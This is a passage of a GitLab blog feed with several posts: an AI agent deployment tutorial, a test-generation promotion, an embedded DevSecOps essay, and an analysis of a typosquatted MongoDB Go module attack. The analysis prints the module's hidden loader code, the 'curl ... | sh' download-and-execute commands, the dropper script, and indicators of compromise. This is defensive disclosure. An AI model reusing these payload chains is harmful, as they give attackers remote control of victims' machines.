<li><a href="https://about.gitlab.com/blog/ci-cd-catalog-goes-ga-no-more-building-pipelines-from-scratch/">CI/CD Catalog goes GA: No more building pipelines from scratch</a></li>
<li><a href="https://about.gitlab.com/blog/demystifying-ci-cd-variables/">GitLab environment variables demystified</a></li>
</ul>
]]></content>
        <author>
            <name>Dov Hershkovitch</name>
            <uri>https://about.gitlab.com/blog/authors/dov-hershkovitch</uri>
        </author>
        <published>2025-07-07T00:00:00.000Z</published>
    </entry>
    <entry>
        <title type="html"><![CDATA[Fast and secure AI agent deployment to Google Cloud with GitLab]]></title>
        <id>https://about.gitlab.com/blog/fast-and-secure-ai-agent-deployment-to-google-cloud-with-gitlab/</id>
        <link href="https://about.gitlab.com/blog/fast-and-secure-ai-agent-deployment-to-google-cloud-with-gitlab/"/>
        <updated>2025-07-07T00:00:00.000Z</updated>
        <content type="html"><![CDATA[<p><a href="https://about.gitlab.com/topics/agentic-ai/">Agentic AI</a> is transforming
how we build intelligent applications, but deploying AI agents securely and
efficiently can be challenging. In this tutorial, you'll learn how to deploy
an AI agent built with Google's Agent Development Kit
(<a href="https://cloud.google.com/vertex-ai/generative-ai/docs/agent-development-kit/quickstart">ADK</a>)
to Cloud Run using <a href="https://cloud.google.com/blog/topics/partners/understand-the-google-cloud-gitlab-integration">GitLab's native
integrations</a>
and <a href="https://docs.gitlab.com/ci/components/">CI/CD components</a>.</p>
<h2>What are AI agents and why do they matter?</h2>
<p>Agentic AI represents a significant evolution in artificial intelligence. Unlike traditional generative AI tools that require constant human direction, AI agents leverage advanced language models and natural language processing to take independent action. These systems can understand requests, make decisions, and execute multistep plans to achieve goals autonomously.</p>
<p>This tutorial uses Google's ADK, a flexible and modular framework for developing and deploying AI agents. While optimized for Gemini and the Google ecosystem, ADK is model-agnostic, deployment-agnostic, and built for compatibility with other frameworks.</p>
<h2>Our demo application: Canada City Advisor</h2>
<p>To demonstrate the deployment process, we'll work with a practical example: the Canada City Advisor. This AI agent helps users find their ideal Canadian city based on their preferences and constraints.</p>
<p>Here's how it works:</p>
<ul>
<li>
<p>Users input their budget requirements and lifestyle preferences.</p>
</li>
<li>
<p>The root agent coordinates two sub-agents:</p>
<ul>
<li>A budget analyzer agent that evaluates financial constraints. This draws data obtained from the Canada Mortgage and Housing Corporation.</li>
<li>A lifestyle preferences agent that matches cities to user needs. This includes a weather service that uses <a href="https://open-meteo.com/">Open-Meteo</a> to get the proper city information.</li>
</ul>
</li>
<li>
<p>The system generates personalized city recommendations</p>
</li>
</ul>
<p>This multi-agent architecture showcases the power of agentic AI: different specialized agents working together to solve a complex problem. The sub-agents are only invoked when the root agent determines that budget and lifestyle analysis are needed.</p>
<p><img src="https://res.cloudinary.com/about-gitlab-com/image/upload/v1751576568/obgxpxvlnxtzifddrrz1.png" alt="Multi-agent architecture to develop demo application with agentic AI"></p>
<h2>Prerequisites</h2>
<p>Before we begin, ensure you have:</p>
<ul>
<li>
<p>A Google Cloud project with the following APIs enabled:</p>
<ul>
<li>Cloud Run API</li>
<li>Artifact Registry API</li>
<li>Vertex AI API</li>
</ul>
</li>
<li>
<p>A GitLab project for your source code</p>
</li>
<li>
<p>Appropriate permissions in both GitLab and Google Cloud</p>
</li>
</ul>
<p><strong>Step 1: Set up IAM integration with Workload Identity Federation</strong></p>
<p>The first step establishes secure, keyless authentication between GitLab and Google Cloud using <a href="https://cloud.google.com/iam/docs/workload-identity-federation">Workload Identity Federation</a>. This eliminates the need for service account keys and improves security.</p>
<p>In your GitLab project:</p>
<ol>
<li>
<p>Navigate to <strong>Settings &gt; Integrations &gt; Google Cloud IAM.</strong></p>
</li>
<li>
<p>Provide the following information:</p>
<ul>
<li><strong>Project ID</strong>: Your Google Cloud project ID</li>
<li><strong>Project Number</strong>: Found in your Google Cloud console</li>
<li><strong>Pool ID</strong>: A unique identifier for your workload identity pool</li>
<li><strong>Provider ID</strong>: A unique identifier for your identity provider</li>
</ul>
</li>
</ol>
<p>GitLab will generate a script for you. Copy this script and run it in your Google Cloud Shell to create the Workload Identity Federation.</p>
<p><strong>Step 2: Configure Google Artifact Registry integration</strong></p>
<p>Next, we'll set up the connection to Google Artifact Registry where our container images will be stored.</p>
<ol>
<li>
<p>In GitLab, go to <strong>Settings &gt; Integrations &gt; Google Artifact Registry.</strong></p>
</li>
<li>
<p>Enter:</p>
<ul>
<li><strong>Google Cloud Project ID</strong>: Same as in Step 1</li>
<li><strong>Repository Name</strong>: Name of an existing Artifact Registry repository</li>
<li><strong>Location</strong>: The region where your repository is located</li>
</ul>
</li>
</ol>
<p><strong>Important</strong>: The repository must already exist in Artifact Registry. GitLab won't create a new one for you in this context.</p>
<p>GitLab will generate commands to set up the necessary permissions. Run these in Google Cloud Shell.</p>
<p>Additionally, add these roles to your service principal for Cloud Run deployment:</p>
<ul>
<li>
<p><code>roles/run.admin</code></p>
</li>
<li>
<p><code>roles/iam.serviceAccountUser</code></p>
</li>
<li>
<p><code>roles/cloudbuild.builds.editor</code></p>
</li>
</ul>
<p>You can add these roles using the following gcloud commands:</p>
<pre><code class="language-shell">
GCP_PROJECT_ID=&quot;&lt;your-project-id&gt;&quot; #replace

GCP_PROJECT_NUMBER=&quot;&lt;your-project-number&gt;&quot; #replace

GCP_WORKLOAD_IDENTITY_POOL=&quot;&lt;your-pool-id&gt;&quot; #replace


gcloud projects add-iam-policy-binding ${GCP_PROJECT_ID} \
  --member=&quot;principalSet://iam.googleapis.com/projects/${GCP_PROJECT_NUMBER}/locations/global/workloadIdentityPools/${GCP_WORKLOAD_IDENTITY_POOL}/attribute.developer_access/true&quot; \
  --role='roles/run.admin'

gcloud projects add-iam-policy-binding ${GCP_PROJECT_ID} \
  --member=&quot;principalSet://iam.googleapis.com/projects/${GCP_PROJECT_NUMBER}/locations/global/workloadIdentityPools/${GCP_WORKLOAD_IDENTITY_POOL}/attribute.developer_access/true&quot; \
  --role='roles/iam.serviceAccountUser'

gcloud projects add-iam-policy-binding ${GCP_PROJECT_ID} \
  --member=&quot;principalSet://iam.googleapis.com/projects/${GCP_PROJECT_NUMBER}/locations/global/workloadIdentityPools/${GCP_WORKLOAD_IDENTITY_POOL}/attribute.developer_access/true&quot; \
  --role='roles/cloudbuild.builds.editor'
</code></pre>
<p><strong>Step 3: Create the CI/CD pipeline</strong></p>
<p>Now for the exciting part – let's build our deployment pipeline! GitLab's CI/CD components make this remarkably simple.</p>
<p>Create a <code>.gitlab-ci.yml</code> file in your project root:</p>
<pre><code class="language-yaml">
stages:
  - build
  - test
  - upload
  - deploy

variables:
  GITLAB_IMAGE: $CI_REGISTRY_IMAGE/main:$CI_COMMIT_SHORT_SHA
  AR_IMAGE: $GOOGLE_ARTIFACT_REGISTRY_REPOSITORY_LOCATION-docker.pkg.dev/$GOOGLE_ARTIFACT_REGISTRY_PROJECT_ID/$GOOGLE_ARTIFACT_REGISTRY_REPOSITORY_NAME/main:$CI_COMMIT_SHORT_SHA

build:
  image: docker:24.0.5
  stage: build
  services:
    - docker:24.0.5-dind
  before_script:
    - docker login -u $CI_REGISTRY_USER -p $CI_REGISTRY_PASSWORD $CI_REGISTRY
  script:
    - docker build -t $GITLAB_IMAGE .
    - docker push $GITLAB_IMAGE

include:
  - template: Jobs/Dependency-Scanning.gitlab-ci.yml  # https://gitlab.com/gitlab-org/gitlab/blob/master/lib/gitlab/ci/templates/Jobs/Dependency-Scanning.gitlab-ci.yml
  - template: Jobs/SAST.gitlab-ci.yml  # https://gitlab.com/gitlab-org/gitlab/blob/master/lib/gitlab/ci/templates/Jobs/SAST.gitlab-ci.yml
  - template: Jobs/Secret-Detection.gitlab-ci.yml  # https://gitlab.com/gitlab-org/gitlab/blob/master/lib/gitlab/ci/templates/Jobs/Secret-Detection.gitlab-ci.yml
  - component: gitlab.com/google-gitlab-components/artifact-registry/upload-artifact-registry@main
    inputs:
      stage: upload
      source: $GITLAB_IMAGE
      target: $AR_IMAGE
  - component: gitlab.com/google-gitlab-components/cloud-run/deploy-cloud-run@main
    inputs:
      stage: deploy
      project_id: &quot;&lt;your-project-id&gt;&quot; #replace
      service: &quot;canadian-city&quot;
      region: &quot;us-central1&quot;
      image: $AR_IMAGE
</code></pre>
<p>The pipeline consists of four stages:</p>
<ol>
<li>
<p><strong>Build</strong>: Creates the Docker container with your AI agent</p>
</li>
<li>
<p><strong>Test</strong>: Runs security scans (container scanning, dependency scanning, SAST)</p>
</li>
<li>
<p><strong>Upload</strong>: Pushes the container to Artifact Registry</p>
</li>
<li>
<p><strong>Deploy</strong>: Deploys to Cloud Run</p>
</li>
</ol>
<p>The great thing about using <a href="https://docs.gitlab.com/ci/components/">GitLab's CI/CD components</a> is that you only need to provide a few parameters - the components handle all the complex authentication and deployment logic.</p>
<p><strong>Step 4: Deploy and test</strong></p>
<p>With everything configured, it's time to deploy:</p>
<ol>
<li>
<p>Commit your code and <code>.gitlab-ci.yml</code> to your GitLab repository.</p>
</li>
<li>
<p>The pipeline will automatically trigger.</p>
</li>
<li>
<p>Monitor the pipeline progress in GitLab's CI/CD interface.</p>
</li>
<li>
<p>Once complete, find your Cloud Run URL in the Google Cloud Console.</p>
</li>
</ol>
<p>You'll see each stage execute:</p>
<ul>
<li>
<p>Build stage creates your container.</p>
</li>
<li>
<p>Test stage runs comprehensive security scans.</p>
</li>
<li>
<p>Upload stage pushes to Artifact Registry.</p>
</li>
<li>
<p>Deploy stage creates or updates your Cloud Run service.</p>
</li>
</ul>
<h2>Security benefits</h2>
<p>This approach provides several security advantages:</p>
<ul>
<li>
<p><strong>No long-lived credentials:</strong> Workload Identity Federation eliminates service account keys.</p>
</li>
<li>
<p><strong>Automated security scanning:</strong> Every deployment is scanned for vulnerabilities.</p>
</li>
<li>
<p><strong>Audit trail:</strong> Complete visibility of who deployed what and when.</p>
</li>
<li>
<p><strong>Principle of least privilege:</strong> Fine-grained IAM roles limit access.</p>
</li>
</ul>
<h2>Summary</h2>
<p>By combining GitLab's security features with Google Cloud's powerful AI and serverless platforms, you can deploy AI agents that are both secure and scalable. The integration between GitLab and Google Cloud eliminates much of the complexity traditionally associated with such deployments.</p>
<blockquote>
<p>Use this tutorial's <a href="https://gitlab.com/gitlab-partners-public/google-cloud/demos/ai-agent-deployment">complete code
example</a>
to get started now. Not a GitLab customer yet? Explore the DevSecOps platform with <a href="https://about.gitlab.com/free-trial/">a free trial</a>.</p>
</blockquote>
]]></content>
        <author>
            <name>Regnard Raquedan</name>
            <uri>https://about.gitlab.com/blog/authors/regnard-raquedan</uri>
        </author>
        <published>2025-07-07T00:00:00.000Z</published>
    </entry>
    <entry>
        <title type="html"><![CDATA[Enhance application quality with AI-powered test generation]]></title>
        <id>https://about.gitlab.com/blog/enhance-application-quality-with-ai-powered-test-generation/</id>
        <link href="https://about.gitlab.com/blog/enhance-application-quality-with-ai-powered-test-generation/"/>
        <updated>2025-07-03T00:00:00.000Z</updated>
        <content type="html"><![CDATA[<p>You know how critical application quality is to your customers and reputation. However, ensuring that quality through comprehensive testing can feel like an uphill battle. You're dealing with time-consuming manual processes, inconsistent test coverage across your team, and those pesky issues that somehow slip through the cracks. It's frustrating when your rating drops because quality assurance becomes a bottleneck rather than a safeguard.</p>
<p>Here's where <a href="https://about.gitlab.com/blog/gitlab-duo-with-amazon-q-agentic-ai-optimized-for-aws/">GitLab Duo with Amazon Q </a>, which delivers agentic AI throughout the software development lifecycle for AWS customers, can help transform your QA process. This AI-powered capability can automatically generate comprehensive unit tests for your code, dramatically accelerating your quality assurance workflow. Instead of spending hours writing tests manually, you can let AI analyze your code and create tests that ensure optimal coverage and consistent quality across your entire application.</p>
<h2>How GitLab Duo with Amazon Q works</h2>
<p>So how does this work? Let's walk through the process together.
When you're working on a new feature, you start by selecting the Java class you've added to your project through a merge request. You simply navigate to your merge request and click on the &quot;Changes&quot; tab to see the new code you've added.</p>
<p>Next, you invoke Amazon Q by entering a quick action command. All you need to do is type <code>/q test</code> in the comment box. It's that simple – just a forward slash, the letter &quot;q&quot;, and the word &quot;test&quot;.</p>
<p>Once you hit enter, Amazon Q springs into action. It analyzes your selected code, understanding its structure, logic, and purpose. The AI examines your class methods, dependencies, and potential edge cases to determine what tests are needed.</p>
<p>Within moments, Amazon Q generates comprehensive unit test coverage for your new class. It creates tests that cover not just the happy path, but also edge cases and error conditions you might have overlooked. The generated tests follow your project's existing patterns and conventions, ensuring they integrate seamlessly with your codebase.</p>
<h2>Why use GitLab Duo with Amazon Q?</h2>
<p>Here's the bottom line: You started with a critical challenge – maintaining high-quality applications while dealing with time constraints and inconsistent testing practices. GitLab Duo with Amazon Q addresses this by automating the test generation process, ensuring optimal code coverage and consistent testing standards. The result? Issues are detected before deployment, your applications maintain their quality, and you can develop software faster without sacrificing reliability.</p>
<p>Key benefits of this feature:</p>
<ul>
<li>Significantly reduces time spent writing unit tests</li>
<li>Ensures comprehensive test coverage across your codebase</li>
<li>Maintains consistent testing quality across all team members</li>
<li>Catches issues before they reach production</li>
<li>Accelerates your overall development velocity</li>
</ul>
<p>Ready to see this game-changing feature in action? Watch how GitLab Duo with Amazon Q can transform your quality assurance process:</p>
<figure class="video_container">
<iframe src="https://www.youtube.com/embed/pxlYJVcHY28?si=MhIz6lnHxc6kFhlL" frameborder="0" allowfullscreen="true"></iframe>
</figure>
<h2>Get started with GitLab Duo with Amazon Q today</h2>
<p>Want to learn more about GitLab Duo with Amazon Q? Visit the <a href="https://about.gitlab.com/partners/technology-partners/aws/">GitLab and AWS partner page</a> for detailed information.</p>
<h2>Agentic AI resources</h2>
<ul>
<li><a href="https://about.gitlab.com/blog/agentic-ai-guides-and-resources/">Agentic AI guides and resources</a></li>
<li><a href="https://about.gitlab.com/topics/agentic-ai/">What is agentic AI?</a></li>
<li><a href="https://about.gitlab.com/blog/gitlab-duo-with-amazon-q-agentic-ai-optimized-for-aws/">GitLab Duo with Amazon Q: Agentic AI optimized for AWS generally available</a></li>
<li><a href="https://docs.gitlab.com/user/duo_amazon_q/">GitLab Duo with Amazon Q documentation</a></li>
</ul>
]]></content>
        <author>
            <name>Cesar Saavedra</name>
            <uri>https://about.gitlab.com/blog/authors/cesar-saavedra</uri>
        </author>
        <published>2025-07-03T00:00:00.000Z</published>
    </entry>
    <entry>
        <title type="html"><![CDATA[Why now is the time for embedded DevSecOps]]></title>
        <id>https://about.gitlab.com/blog/why-now-is-the-time-for-embedded-devsecops/</id>
        <link href="https://about.gitlab.com/blog/why-now-is-the-time-for-embedded-devsecops/"/>
        <updated>2025-07-01T00:00:00.000Z</updated>
        <content type="html"><![CDATA[<p>For embedded systems teams, DevSecOps has traditionally seemed like an approach better suited to SaaS applications than firmware development. But this is changing. Software is now a primary differentiator in hardware products. New market expectations demand modern development practices. In response, organizations are pursuing &quot;embedded DevSecOps.&quot;</p>
<p>What is embedded DevSecOps? The application of collaborative engineering practices, integrated toolchains, and automation for building, testing, and securing software to embedded systems development. Embedded DevSecOps includes necessary adaptations for hardware integration.</p>
<h2>Convergence of market forces</h2>
<p>Three powerful market forces are converging to compel embedded teams to modernize their development practices.</p>
<h3>1. The software-defined product revolution</h3>
<p>Products once defined primarily by their hardware are now differentiated by their software capabilities. The software-defined vehicle (SDV) market tells a compelling story in this regard. It's projected to grow from $213.5 billion in 2024 to <a href="https://www.marketsandmarkets.com/Market-Reports/software-defined-vehicles-market-187205966.html">$1.24 trillion</a> by 2030, a massive 34% compound annual growth rate.
The software content in these products is growing considerably. By the end of 2025, the average vehicle is expected to contain <a href="https://www.statista.com/statistics/1370978/automotive-software-average-lines-of-codes-per-vehicle-globally/">650 million lines of code</a>. Traditional embedded development approaches cannot handle this level of software complexity.</p>
<h3>2. Hardware virtualization as a technical enabler</h3>
<p>Hardware virtualization is a key technical enabler of embedded DevSecOps. Virtual electronic control units (vECUs), cloud-based ARM CPUs, and sophisticated simulation environments are becoming more prevalent. Virtual hardware allows testing that once required physical hardware.</p>
<p>These virtualization technologies provide a foundation for continuous integration (<a href="https://about.gitlab.com/topics/ci-cd/">CI</a>). But their value is fully realized only when integrated into an automated workflow. Combined with collaborative development practices and automated pipelines, virtual testing helps teams detect issues much earlier, when fixes are far less expensive. Without embedded DevSecOps practices and tooling to orchestrate these virtual resources, organizations can't capitalize on the virtualization trend.</p>
<h3>3. The competitive and economic reality</h3>
<p>Three interrelated forces are reshaping the competitive landscape for embedded development:</p>
<ul>
<li>The talent war has shifted decisively. As an embedded systems leader at a GitLab customer explained, “No embedded engineers graduating from college today know legacy tools like Perforce. They know Git. These young engineers will work at a company for six months on legacy tools, then quit.” Companies using outdated tools may lose their engineering future.</li>
<li>This talent advantage translates into competitive superiority. Tech-forward companies that attract top engineers with modern practices achieve remarkable results. For example, in 2024, <a href="https://spacenews.com/spacex-launch-surge-helps-set-new-global-launch-record-in-2024/">SpaceX</a> performed more orbital launches than the rest of the world combined. Tech-forward companies excel at software development and embrace a modern development culture. This, among other things, creates efficiencies that legacy companies struggle to match.</li>
<li>The rising costs of embedded development — driven by long feedback cycles — create an urgent need for embedded DevSecOps. When developers have to wait weeks to test code on hardware test benches, productivity remains inherently low. Engineers lose context while they wait and must switch back when results finally arrive. The problem worsens when defects enter the picture: Bugs become more expensive to fix the later they're discovered, and long feedback cycles magnify this cost in embedded systems.</li>
</ul>
<p>Organizations are adopting embedded DevSecOps to help combat these challenges.</p>
<h2>Priority transformation areas</h2>
<p>Based on these market forces, forward-thinking embedded systems leaders are implementing embedded DevSecOps in the following ways.</p>
<h3>From hardware bottlenecks to continuous testing</h3>
<p>Hardware-testing bottlenecks represent one of the most significant constraints in traditional embedded development. These delays create the unfavorable economics described earlier — when developers wait weeks for hardware access, defect costs spiral.
Addressing this challenge requires a multifaceted approach including:</p>
<ul>
<li>Automating the orchestration of expensive shared hardware test benches among embedded developers</li>
<li>Integrating both SIL (Software-in-the-Loop) and HIL (Hardware-in-the-Loop) testing into automated CI pipelines</li>
<li>Standardizing builds with version-controlled environments</li>
</ul>
<p>Embedded developers can accomplish this with GitLab's <a href="https://gitlab.com/gitlab-accelerates-embedded/comp/device-cloud">On-Premises Device Cloud</a>, a CI/CD component. By automating the orchestration of firmware tests on virtual and real hardware, teams are better positioned to reduce feedback cycles from weeks to hours. They can also catch more bugs earlier in the software development lifecycle.</p>
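<p>As a rough sketch of what such a pipeline can look like, the following <code>.gitlab-ci.yml</code> builds firmware, runs software-in-the-loop tests against a virtual target, then routes hardware-in-the-loop tests to a runner attached to a physical bench. The job names, scripts, and runner tag are hypothetical placeholders, not the Device Cloud component's actual interface:</p>

```yaml
# Illustrative pipeline only: scripts and the runner tag are placeholders.
stages:
  - build
  - sil-test
  - hil-test

build-firmware:
  stage: build
  script:
    - make firmware.bin
  artifacts:
    paths:
      - firmware.bin

sil-test:
  stage: sil-test
  script:
    # Software-in-the-loop: exercise the firmware image on a virtual ECU.
    - ./run_simulation --image firmware.bin

hil-test:
  stage: hil-test
  tags:
    - bench-stm32   # routes the job to a runner attached to a physical test bench
  script:
    # Hardware-in-the-loop: flash the real board and run the test suite.
    - ./flash_and_test firmware.bin
```

<p>The key idea is that the scarce physical bench is consumed only in the final stage, after cheap virtual testing has already filtered out most defects.</p>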
<h3>Automating compliance and security governance</h3>
<p>Embedded systems face strict regulatory requirements. Manual compliance processes are unsustainable.
Leading organizations are transforming how they comply with these requirements by:</p>
<ul>
<li>Replacing manual workflows with automated <a href="https://about.gitlab.com/blog/introducing-custom-compliance-frameworks-in-gitlab/">compliance frameworks</a></li>
<li>Integrating specialized functional safety, security, and code quality tools into automated continuous integration pipelines</li>
<li>Automating approval workflows, enforcing code reviews, and maintaining audit trails</li>
<li>Configuring compliance frameworks for specific standards like ISO 26262 or DO-178C</li>
</ul>
<p>This approach enables greater compliance maturity without additional headcount — turning what was once a burden into a competitive advantage. One leading electric vehicle (EV) manufacturer executes 120,000 CI/CD jobs per day with GitLab, many of which include compliance checks. And they can deploy bug fixes to vehicles within an hour of discovery. This level of scale and speed would be extremely difficult without automated compliance workflows.</p>
<h3>Enabling collaborative innovation</h3>
<p>Historically, for valid business and technical reasons, embedded developers have largely worked alone at their desks. Collaboration has been limited. Innovative organizations break down these barriers by enabling shared code visibility through integrated source control and CI/CD workflows. These modern practices attract and retain engineers while unlocking innovation that would remain hidden in isolated workflows.
As one director of DevOps at a tech-forward automotive manufacturer (a GitLab customer) explains: &quot;It's really critical for us to have a single pane of glass that we can look at and see the statuses. The developers, when they bring a merge request, are aware of the status of a given workflow in order to move as fast as possible.&quot; This transparency accelerates innovation, enabling automakers to rapidly iterate on software features that differentiate their vehicles in an increasingly competitive market.</p>
<h2>The window of opportunity</h2>
<p>Embedded systems leaders have a clear window of opportunity to gain a competitive advantage through DevSecOps adoption. But the window won't stay open forever. Software continues to become the primary differentiator in embedded products, and the gap between leaders and laggards will only widen.
Organizations that successfully adopt DevSecOps will reduce costs, accelerate time-to-market, and unlock innovation that differentiates them in the market. The embedded systems leaders of tomorrow are the ones embracing DevSecOps today.</p>
<blockquote>
<p>While this article explored why now is the critical time for embedded teams to adopt DevSecOps, you may be wondering about the practical steps to get started. Learn how to put these concepts into action with our guide: <a href="https://about.gitlab.com/blog/4-ways-to-accelerate-embedded-development-with-gitlab/">4 ways to accelerate embedded development with GitLab</a>.</p>
</blockquote>
]]></content>
        <author>
            <name>Matt DeLaney</name>
            <uri>https://about.gitlab.com/blog/authors/matt-delaney</uri>
        </author>
        <published>2025-07-01T00:00:00.000Z</published>
    </entry>
    <entry>
        <title type="html"><![CDATA[GitLab catches MongoDB Go module supply chain attack]]></title>
        <id>https://about.gitlab.com/blog/gitlab-catches-mongodb-go-module-supply-chain-attack/</id>
        <link href="https://about.gitlab.com/blog/gitlab-catches-mongodb-go-module-supply-chain-attack/"/>
        <updated>2025-06-30T00:00:00.000Z</updated>
        <content type="html"><![CDATA[<p>Software supply chain attacks via malicious dependencies continue to be one of the most significant security threats to modern software development. The widespread use of open source components has enabled development teams to build applications rapidly, but it has also widened the attack surface area. The growing ecosystem of third-party packages presents numerous opportunities for attackers to exploit dependencies through techniques like typosquatting, dependency confusion, and package impersonation, making it increasingly challenging for developers to distinguish legitimate packages from malicious imposters.</p>
<p>To address this challenge, GitLab's Vulnerability Research team recently developed an automated detection system designed to proactively identify malicious dependencies in software supply chains. The system combines multiple detection techniques that work in concert:</p>
<ul>
<li>Automated typosquatting detection, which identifies suspicious naming patterns</li>
<li>Semantic code analysis, which flags potentially malicious behaviors like network requests or command executions</li>
<li>AI-assisted initial screening for advanced payload and obfuscation detection</li>
</ul>
<p>The Vulnerability Research team uses this multi-layered approach to continuously scan newly published dependencies across major ecosystems, providing early warning of supply chain attacks.</p>
<p>Using this detection system, GitLab recently identified a live typosquatting attack in the wild that leveraged a malicious MongoDB Go module. Below are details on the attack and how GitLab works to keep supply chains safe.</p>
<h2>Executive summary: A MongoDB module that's not quite right</h2>
<p>Our detection system flagged a newly published Go module called <code>github.com/qiniiu/qmgo</code>, closely mimicking the popular <a href="https://www.mongodb.com/">MongoDB</a> module <code>github.com/qiniu/qmgo</code>. The legitimate module describes itself as &quot;The Go driver for MongoDB&quot; and has gained traction in the Go community.</p>
<p>To disguise the malicious module as legitimate, the threat actor used a GitHub username nearly identical to the one associated with the real module, with one subtle change: an extra “i” (<code>qiniu</code> → <code>qiniiu</code>). To the casual observer scrolling through search results or auto-complete suggestions, this difference would be very easy to overlook.</p>
<p>The new module’s code was a working copy of the legitimate <code>qmgo</code> module. However, malicious code was inserted into the <code>NewClient</code> function in <code>client.go</code>, a function that developers would naturally call when initializing their MongoDB connection. Concealing the malicious code within a function made the payload less likely to execute during runtime security analysis, while ensuring that it would execute during normal usage in real applications.</p>
<p>After we reported the malicious module, it was removed within approximately 19 hours. However, the threat actor quickly adapted, publishing a second typosquatted version (<code>github.com/qiiniu/qmgo</code>) just four days later with identical malicious code. This follow-up module was also detected and taken down roughly one hour after discovery. The rapid redeployment demonstrates the persistent nature of these attacks and highlights why proactive detection is crucial in minimizing exposure windows.</p>
<h2>Technical deep dive: Peeling back the layers</h2>
<p>The threat actor took steps to hide the attack. The malicious payload used a multilayered approach, starting with a compact code snippet that triggered a chain of remote payload downloads:</p>
<pre><code class="language-go">txt, err := script.Get(&quot;https://raw.githubusercontent.com/qiiniu/vue-element-admin/refs/heads/main/public/update.html&quot;).String()  
if err == nil {  
    txt2, err := script.Get(string(strings.Replace(txt, &quot;\n&quot;, &quot;&quot;, -1))).String()  
    if err == nil {  
        exec.Command(&quot;/bin/sh&quot;, &quot;-c&quot;, string(txt2)).Start()  
    }  
}  
</code></pre>
<p>The attack unfolds in four distinct layers:</p>
<p><strong>Layer 1:</strong> The code fetches <code>update.html</code> from another repository owned by the typosquat account <code>qiiniu/vue-element-admin</code>. The file contained a single line:</p>
<pre><code>https://img.googlex.cloud/seed.php
</code></pre>
<p><strong>Layer 2:</strong> The code then fetches <code>https://img.googlex.cloud/seed.php</code>, which returns a single shell command to execute:</p>
<pre><code class="language-bash">curl -s http://207.148.110.29:80/logon61.gif|sh
</code></pre>
<p><strong>Layer 3:</strong> The command fetches <code>http://207.148.110.29:80/logon61.gif</code> with curl and executes the response as a shell script. The shell script downloads what appears to be an MP3 file (<code>chainelli.mp3</code>) to <code>/tmp/vod</code>, makes it executable, runs it, and immediately deletes it:</p>
<pre><code class="language-bash">#!/bin/sh  
rm -rf /tmp/vod  
curl -s http://207.148.110.29:80/chainelli.mp3 -o /tmp/vod  
chmod 777 /tmp/vod  
/tmp/vod  
rm -rf /tmp/vod  
</code></pre>
<p><strong>Layer 4:</strong> The <code>chainelli.mp3</code> file is actually a statically linked, stripped ELF Go binary designed to establish persistent remote access. Once executed, the malware attempts to connect to its command and control server at <code>ellipal.spoolsv.cyou</code> on port 443 (both TCP and UDP), using a custom encrypted communication protocol with a hardcoded RSA key. From there, it provides the threat actor with remote administration capabilities:</p>
<ul>
<li>Complete remote shell access and one-off command execution</li>
<li>Screenshot captures</li>
<li>SOCKS proxy functionality to make connections through the compromised machine</li>
<li>Configurable sleep interval between check-ins with the command and control server to avoid detection</li>
<li>Standard remote access trojan features like filesystem browsing and upload/download</li>
</ul>
<h2>They're back (already)</h2>
<p>Just four days after GitLab reported the initial malicious module and saw it removed, <code>github.com/qiiniu/qmgo</code> appeared: a second typosquatted version with identical malicious code. This quick redeployment demonstrates the persistent nature of these attacks and highlights how threat actors adapt quickly to takedown efforts.</p>
<h2>GitLab’s approach: Finding needles in haystacks</h2>
<p>The initial discovery and persistence of this attack validated our approach to proactive dependency monitoring and threat detection. GitLab’s detection system combines multiple techniques to identify malicious dependencies:</p>
<p><strong>Typosquatting detection:</strong> GitLab monitors newly published dependencies and looks for packages that exhibit signs of various typosquatting strategies.</p>
<p><strong>Semantic heuristics:</strong> Our system statically analyzes code for patterns like network requests, command executions, and other behaviors typical of malicious payloads.</p>
<p><strong>AI-assisted analysis:</strong> A <a href="https://about.gitlab.com/blog/what-is-a-large-language-model-llm/">large language model</a> does the initial analysis of the suspicious parts of the code to help us weed out obvious false positives, detect complex payloads, and identify obfuscation techniques used to hide malicious intent.</p>
<p><strong>Human review:</strong> A human receives an alert to verify the finding and to perform advanced analysis.</p>
<h2>Recommendations: Staying ahead of persistent supply chain threats</h2>
<p>This attack highlights the ongoing challenges in securing software supply chains. The multilayered obfuscation and rapid redeployment after takedown demonstrate that threat actors are willing to invest significant effort in targeting popular dependencies.</p>
<p>The quick pivot to new typosquatted packages after our initial report highlights a fundamental weakness in the current ecosystems: package managers typically only remove malicious dependencies after they've been published, discovered, and reported by the community. This reactive approach leaves a dangerous window where developers can unknowingly consume compromised packages. Proactive monitoring and detection systems like the one GitLab has developed can help close this gap by identifying threats during the publication process itself.</p>
<p>We've provided indicators of compromise (IOCs) in the next section, which you can use in your monitoring systems to detect this specific campaign.</p>
<h2>Indicators of compromise</h2>
<table>
<thead>
<tr>
<th style="text-align:left">IOC</th>
<th style="text-align:left">Description</th>
</tr>
</thead>
<tbody>
<tr>
<td style="text-align:left"><code>github.com/qiniiu/qmgo</code></td>
<td style="text-align:left">Malicious Go module</td>
</tr>
<tr>
<td style="text-align:left"><code>github.com/qiiniu/qmgo</code></td>
<td style="text-align:left">Malicious Go module</td>
</tr>
<tr>
<td style="text-align:left"><code>https://raw.githubusercontent.com/qiniiu/vue-element-admin/refs/heads/main/public/update.html</code></td>
<td style="text-align:left">Payload delivery URL</td>
</tr>
<tr>
<td style="text-align:left"><code>https://raw.githubusercontent.com/qiiniu/vue-element-admin/refs/heads/main/public/update.html</code></td>
<td style="text-align:left">Payload delivery URL</td>
</tr>
<tr>
<td style="text-align:left"><code>https://img.googlex.cloud/seed.php</code></td>
<td style="text-align:left">Payload delivery URL</td>
</tr>
<tr>
<td style="text-align:left"><code>http://207.148.110.29:80/logon61.gif</code></td>
<td style="text-align:left">Payload delivery URL</td>
</tr>
<tr>
<td style="text-align:left"><code>http://207.148.110.29:80/chainelli.mp3</code></td>
<td style="text-align:left">Payload delivery URL</td>
</tr>
<tr>
<td style="text-align:left"><code>img.googlex.cloud</code></td>
<td style="text-align:left">Payload delivery host</td>
</tr>
<tr>
<td style="text-align:left"><code>207.148.110.29</code></td>
<td style="text-align:left">Payload delivery host</td>
</tr>
<tr>
<td style="text-align:left"><code>ellipal.spoolsv.cyou</code></td>
<td style="text-align:left">Command &amp; Control host</td>
</tr>
<tr>
<td style="text-align:left"><code>6ada952c592f286692c59028c5e0fc3fa589759f</code></td>
<td style="text-align:left">SHA-1 checksum of chainelli.mp3 remote administration malware</td>
</tr>
<tr>
<td style="text-align:left"><code>8ae533e2d1d89c871908cbcf5c7d89c433d09b2e7f7d4ade3aef46c55b66509c</code></td>
<td style="text-align:left">SHA-256 checksum of chainelli.mp3 remote administration malware</td>
